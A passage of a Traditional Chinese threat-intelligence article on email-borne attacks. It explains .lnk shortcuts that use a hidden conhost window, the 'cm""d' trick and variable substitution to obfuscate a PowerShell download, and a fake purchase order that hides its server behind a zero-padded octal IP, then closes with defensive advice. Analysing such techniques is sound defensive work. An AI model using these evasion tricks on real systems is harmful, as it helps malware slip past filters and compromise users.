<li><strong style="font-size: 18px; text-indent: -18pt;"><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">變數替換與隱蔽視窗：<br></span></strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">這類透過</span><span lang="EN-US" style="text-indent: -18pt;">lnk</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">檔進行攻擊的樣本還有許多其他變體，有許多手法的利用都是可用來適應或隱蔽系統內建的執行方式：例如：呼叫</span><span lang="EN-US" style="text-indent: -18pt;">conhost.exe</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">並輔以</span><span lang="EN-US" style="text-indent: -18pt;">--headless</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">來確保呼叫</span><span lang="EN-US" style="text-indent: -18pt;">cmd.exe</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">執行時不會跳出黑色的命令提示字元視窗。在指令列中，為避免惡意指令被偵測出來，故意將</span><span lang="EN-US" style="text-indent: -18pt;">cmd</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">寫為</span><span lang="EN-US" style="text-indent: -18pt;">`cm""d`</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">，而</span><span lang="EN-US" style="text-indent: -18pt;">Windows</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">指令中，字串內的雙引號會被忽略，所以</span><span lang="EN-US" style="text-indent: -18pt;"> `cm""d` </span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">實際上就是</span><span lang="EN-US" style="text-indent: -18pt;"> `cmd`</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">，可以被執行。並且同時，指令中以</span><span lang="EN-US" style="text-indent: -18pt;">/V:ON</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">開啟「延遲環境變數擴充」（</span><span lang="EN-US" style="text-indent: -18pt;">Delayed Environment Variable Expansion</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">），讓</span><span lang="EN-US" style="text-indent: -18pt;">Windows </span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">允許使用驚嘆號</span><span lang="EN-US" style="text-indent: -18pt;"> `!</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">變數名稱</span><span lang="EN-US" style="text-indent: -18pt;">!` </span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">來讀取變數，並在程式執行的「當下」才去解析並替換它的值。接下來，字串變數替換技術</span><span lang="EN-US" style="text-indent: -18pt;">set yw=t&amp;&amp; powershell func!yw!ion ge!yw!i!yw!...</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">，還原後即為</span><span lang="EN-US" style="text-indent: -18pt;"> function getit...</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">）來混淆</span><span lang="EN-US" style="text-indent: -18pt;"> PowerShell </span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">指令。它會在背景偷偷下載惡意腳本</span><span style="text-indent: -18pt;"> </span><span lang="EN-US" style="text-indent: -18pt;">tp.js </span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">執行，同時下載一份正常的</span><span lang="EN-US" style="text-indent: -18pt;"> sample.pdf </span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">並開啟，以此轉移使用者的注意力。</span></li>
</ul>
<p class="MsoListParagraphCxSpMiddle" style="text-indent: -18pt; text-align: center;"><span lang="EN-US"><span style="mso-no-proof: yes;"><!-- [if gte vml 1]><v:shape id="圖片_x0020_3"
 o:spid="_x0000_i1026" type="#_x0000_t75" style='width:204.75pt;height:251.25pt;
 visibility:visible;mso-wrap-style:square'>
 <v:imagedata src="file:///C:/Users/IvyChen/AppData/Local/Temp/msohtmlclip1/01/clip_image005.jpg"
  o:title=""/>
</v:shape><![endif]--><!-- [if !vml]--><img style="display: block; margin-left: auto; margin-right: auto;" src="https://news.taiwannet.com.tw/news/image/e199e280661b449f9c0d85dc306f1857.jpg" width="273" height="335"><!--[endif]--></span><br></span><span style="color: rgb(53, 152, 219); font-size: 12pt;"><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">指令中使用了字串變數替換技術</span></span></p>
<p class="MsoListParagraphCxSpLast"><span lang="EN-US">&nbsp;</span></p>
<p class="MsoNormal"><strong><span lang="EN-US">3. </span></strong><strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">惡意文件內的零填充</span><span lang="EN-US"> IP </span></strong><strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">網址混淆技術</span></strong></p>
<p class="MsoNormal"><strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">攻擊手法：利用底層網路解析特性繞過字串過濾</span></strong></p>
<p class="MsoNormal"><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">這是一起夾帶於偽造採購單文件（</span><span lang="EN-US">PO #4300019386.docx</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">）內的精巧攻擊。攻擊者並未在文件中直接寫入一般的</span><span lang="EN-US"> URL </span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">或</span><span lang="EN-US"> IP</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">，而是採用了不常見的八進位與零填充（</span><span lang="EN-US">Zero-Padded</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">）技術。</span></p>
<p><strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">技術剖析</span></strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">：</span></p>
<ul>
<li><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">攻擊者將惡意伺服器的</span><span lang="EN-US"> IP </span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">轉換為八進位格式，並在前方加上大量的「</span><span lang="EN-US">0</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">」：</span><span lang="EN-US">00000000000000000000000000000000000000030000730347</span></li>
<li><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">網址路徑同樣填滿了零：</span><span lang="EN-US">/00000000000000000000000003.php</span></li>
<li><strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">底層邏輯</span></strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">：許多郵件閘道或資安設備是依靠「正規表示式（</span><span lang="EN-US">Regex</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">）」來尋找</span><span lang="EN-US"> http://192.168.x.x </span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">格式的網址。這串看似亂碼的數字能完美繞過字串比對！但當使用者點擊時，</span><span lang="EN-US">Windows </span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">內建的網路</span><span lang="EN-US"> API</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">（如</span><span lang="EN-US"> WinINet</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">）與主流瀏覽器會偵測到數字前方的</span><span lang="EN-US"> 0</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">，並將其識別為八進位表示法的起始標記。儘管中間填充了大量冗餘的零，底層解析器仍能正確將這串八進位數值還原為駭客的真實</span><span lang="EN-US"> IP </span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">位址進行連線，順利下載惡意檔案。</span></li>
</ul>
<p><span lang="EN-US"><span style="mso-no-proof: yes;"><!-- [if gte vml 1]><v:shape id="圖片_x0020_4"
       o:spid="_x0000_i1025" type="#_x0000_t75" style='width:414.75pt;height:24pt;
       visibility:visible;mso-wrap-style:square'>
       <v:imagedata src="file:///C:/Users/IvyChen/AppData/Local/Temp/msohtmlclip1/01/clip_image007.png"
        o:title=""/>
      </v:shape><![endif]--><!-- [if !vml]--><img style="display: block; margin-left: auto; margin-right: auto;" src="https://news.taiwannet.com.tw/news/image/0235a38dd1e54dac83dbc503ea93c626.png" width="553" height="32"><!--[endif]--></span></span></p>
<p style="text-align: center;"><span style="font-size: 12pt; color: rgb(53, 152, 219);"><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">攻擊者將惡意伺服器的</span><span lang="EN-US"> IP </span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">轉換為八進位格式</span></span></p>
<p class="MsoNormal"><strong><span lang="EN-US">&nbsp;</span></strong><strong><span lang="EN-US">&nbsp;</span></strong></p>
<p class="MsoNormal"><strong><span style="font-size: 14.0pt; line-height: 115%; font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">總結與防禦建議</span></strong></p>
<p class="MsoNormal"><strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">關鍵態勢與攻擊者意圖</span></strong></p>
<p class="MsoNormal"><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">本季的威脅事件明確指出，攻擊者的首要目標是「繞過邊界防護」<strong>與</strong>「竊取雲端存取權限」：他們將攻擊鏈拆解得更為破碎，利用微軟官方的登入機制來建立信任感（騙過人也騙過機器）；使用罕見的</span><span lang="EN-US"> URL </span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">特殊表示手法（零填充</span><span lang="EN-US"> IP</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">）可用以躲避靜態偵測；或利用</span><span lang="EN-US"> .lnk </span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">捷徑檔結合</span><span lang="EN-US"> PowerShell </span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">來進行無文件攻擊（</span><span lang="EN-US">Fileless Attack</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">），顯示駭客正積極避免在留下任何傳統可被偵測的惡意執行檔特徵。</span></p>
<p class="MsoNormal"><span lang="EN-US">&nbsp;</span></p>
<p class="MsoNormal"><strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">未來趨勢</span></strong></p>
<ol>
<li><strong><span lang="EN-US">SaaS </span></strong><strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">服務利用加劇</span></strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">：利用</span><span lang="EN-US"> Google</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">、</span><span lang="EN-US">Microsoft</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">、</span><span lang="EN-US">AWS </span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">等高信譽網域進行釣魚跳轉或惡意程式代管將成為常態。</span></li>
<li><strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">非傳統辦公文件格式崛起</span></strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">：除了</span><span lang="EN-US"> .lnk</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">，未來如</span><span lang="EN-US"> ISO</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">、</span><span lang="EN-US">IMG </span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">甚至</span><span lang="EN-US"> OneNote </span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">檔案（</span><span lang="EN-US">.one</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">）夾帶惡意程式的手法將持續增加。</span></li>
<li><strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">針對資安設備的「反偵測」技術</span></strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">：各種編碼、混淆手段的利用下，未來將有更多郵件只在「真實使用者環境」中才會展露惡意行為。</span></li>
</ol>
<p class="MsoNormal" style="margin-left: 36.0pt;"><strong><span lang="EN-US">&nbsp;</span></strong></p>
<p class="MsoNormal"><strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">防護建議</span></strong></p>
<p class="MsoNormal"><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">企業提供的雲端服務，須留意或關閉一般使用者自行授權第三方應用程式存取企業資料的權限，建議改為集中審核制，防範</span><span lang="EN-US"> OAuth </span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">釣魚。對於外部連結，應啟用「點擊時重寫與動態防護」（</span><span lang="EN-US">Time-of-Click Protection</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">），確保在用戶點擊當下進行二次驗證。</span></p>]]></description>
    </item>
  </channel>
</rss>